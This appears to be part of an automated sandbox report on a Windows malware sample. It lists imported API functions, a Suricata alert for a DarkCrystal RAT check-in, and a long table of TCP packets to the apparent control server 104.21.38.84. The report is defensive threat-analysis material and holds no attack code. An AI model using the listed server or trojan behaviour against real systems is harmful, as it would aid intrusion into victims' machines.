IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-01T15:02:11.758998+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730104.21.38.8480TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 1, 2025 15:02:11.165004015 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.169943094 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.170027971 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.170650005 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.175463915 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.525337934 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.530282021 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.627216101 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.758997917 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.909101963 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.909121990 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.909133911 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:11.909176111 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.943018913 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:11.947912931 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.040903091 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.041290045 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.046088934 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.296453953 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.446530104 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.671181917 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.671375036 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.676099062 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.676168919 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.676310062 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.676381111 CET8049730104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.676434040 CET4973080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.681055069 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.686307907 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.691148043 CET8049734104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:12.691303015 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.691539049 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:12.696305990 CET8049734104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.024851084 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.029789925 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.029942989 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.040324926 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.045150042 CET8049734104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.124960899 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.135201931 CET8049734104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.227792978 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.227880001 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.397224903 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.398500919 CET8049734104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.524640083 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.524709940 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.550709009 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.551809072 CET4973580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.556355000 CET8049733104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.556412935 CET4973380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.557287931 CET8049735104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.557378054 CET4973580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.557497978 CET4973580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.562874079 CET8049735104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.602324009 CET4973580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.651361942 CET8049735104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.935853004 CET8049735104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.935949087 CET4973580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.962549925 CET4973480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.965539932 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.971967936 CET8049736104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:13.972049952 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.972496033 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:13.978611946 CET8049736104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:14.325496912 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.331110954 CET8049736104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:14.416939020 CET8049736104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:14.540296078 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.692692041 CET8049736104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:14.824958086 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.825989008 CET4973880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.830097914 CET8049736104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:14.830163002 CET4973680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.830811024 CET8049738104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:14.830884933 CET4973880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.831027985 CET4973880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:14.835803986 CET8049738104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.186120033 CET4973880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.191049099 CET8049738104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.282783031 CET8049738104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.446546078 CET4973880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.536407948 CET8049738104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.633615017 CET4974180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.638452053 CET8049741104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.638520956 CET4974180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.638679028 CET4974180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.643654108 CET8049741104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.680762053 CET4974180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.681493044 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.686325073 CET8049742104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.686448097 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.686604977 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.691369057 CET8049742104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.727355957 CET8049741104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.759032011 CET4973880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:15.993524075 CET8049741104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:15.993572950 CET4974180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.040594101 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.045494080 CET8049742104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:16.160638094 CET8049742104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:16.227780104 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.421458960 CET8049742104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:16.487469912 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.554889917 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.555804968 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.559920073 CET8049742104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:16.559967995 CET4974280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.560691118 CET8049745104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:16.560771942 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.560880899 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.565623999 CET8049745104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:16.915397882 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:16.920283079 CET8049745104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.023051023 CET8049745104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.119477034 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.270081997 CET8049745104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.337167978 CET4974580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.402064085 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.407042027 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.407124043 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.407289028 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.412086964 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.760162115 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:17.765090942 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:17.867383957 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.024719954 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.122817039 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.337171078 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.572232008 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.573785067 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.577287912 CET8049748104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.577502966 CET4974880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.578672886 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.578739882 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.595827103 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.600682974 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.625885963 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.626046896 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.630697012 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.630810022 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.641189098 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.645963907 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.671380997 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.948111057 CET8049751104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:18.948162079 CET4975180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.993779898 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:18.998625040 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.084362984 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.134088993 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.353039980 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.399677038 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.492067099 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.493696928 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.498528957 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.498616934 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.498711109 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.500093937 CET8049752104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.500150919 CET4975280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.503515005 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.853215933 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:19.858201027 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:19.963844061 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.008346081 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.223815918 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.337182999 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.354238033 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.358474970 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.464600086 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.464766026 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.464797020 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.464950085 CET8049753104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.465044022 CET4975380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.465046883 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.465764046 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.470499992 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.909554005 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:20.914602041 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:20.918656111 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.024744987 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.261053085 CET8049754104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.314806938 CET4975480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.391740084 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.396661997 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.396737099 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.396924973 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.401709080 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.743516922 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:21.748487949 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.868206024 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:21.915290117 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.127341986 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.180912018 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.257241964 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.257632017 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.264136076 CET8049755104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.264208078 CET4975580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.264467955 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.264525890 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.264643908 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.269443989 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.618623018 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.623564959 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.708975077 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:22.776676893 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:22.975405931 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.131741047 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.132215023 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.137607098 CET8049756104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.137686968 CET4975680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.137911081 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.137990952 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.138154984 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.142993927 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.493690014 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.498624086 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.588295937 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.634053946 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.778522968 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.778872013 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.783488035 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.783564091 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.783795118 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.783821106 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.783916950 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.788602114 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.904853106 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.909756899 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.909840107 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.909970999 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.914690971 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.135597944 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.140544891 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.140678883 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.228458881 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.259387970 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.266453028 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.274669886 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.355937958 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.402503014 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.527369976 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.571727037 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.609911919 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.683837891 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.726068974 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.726162910 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.726874113 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.731030941 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.731093884 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.731753111 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.731848001 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.731966972 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.736011028 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.736067057 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.739351034 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.087332964 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.092230082 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.192478895 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.243549109 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.455626011 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.509066105 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.600737095 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.606178999 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.606286049 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.606446028 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.611578941 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.962294102 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.967255116 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.083607912 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.134064913 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.335973978 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.384054899 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.463171959 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.463898897 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.468262911 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.468327999 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.468744040 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.468808889 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.468905926 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.473694086 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.821665049 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.826549053 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.923563004 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.977838039 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.195652008 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:27.243519068 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.342487097 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.342933893 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.347641945 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:27.347728968 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.347803116 CET8049763104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:27.347875118 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.348082066 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.352859974 CET8049763104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:27.696805954 CET4976380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:27.704045057 CET8049763104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:27.806298971 CET8049763104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:27.852905035 CET4976380192.168.2.4104.21.38.84
